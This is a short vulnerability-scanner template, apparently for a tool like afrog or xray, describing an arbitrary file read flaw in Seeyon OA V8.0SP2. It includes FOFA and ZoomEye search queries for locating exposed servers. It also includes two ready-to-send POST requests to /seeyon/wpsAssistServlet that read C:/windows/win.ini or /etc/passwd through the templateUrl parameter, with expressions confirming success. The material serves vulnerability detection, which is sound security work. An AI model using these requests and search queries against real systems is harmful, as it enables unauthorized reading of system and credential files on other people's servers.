漏洞描述
FOFA: app="致远互联-OA" && title="V8.0SP2"
ZoomEye: app:"用友 致远OA"
id: seeyon-wpsassist-servlet-fileread
info:
name: 致远OA存在任意文件读取漏洞
author: zan8in
severity: high
verified: true
description: |-
FOFA: app="致远互联-OA" && title="V8.0SP2"
ZoomEye: app:"用友 致远OA"
tags: seeyon,fileread
created: 2023/10/31
rules:
r0:
request:
method: POST
path: /seeyon/wpsAssistServlet
body: flag=template&templateUrl=C:/windows/win.ini
expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
r1:
request:
method: POST
path: /seeyon/wpsAssistServlet
body: flag=template&templateUrl=/etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() || r1()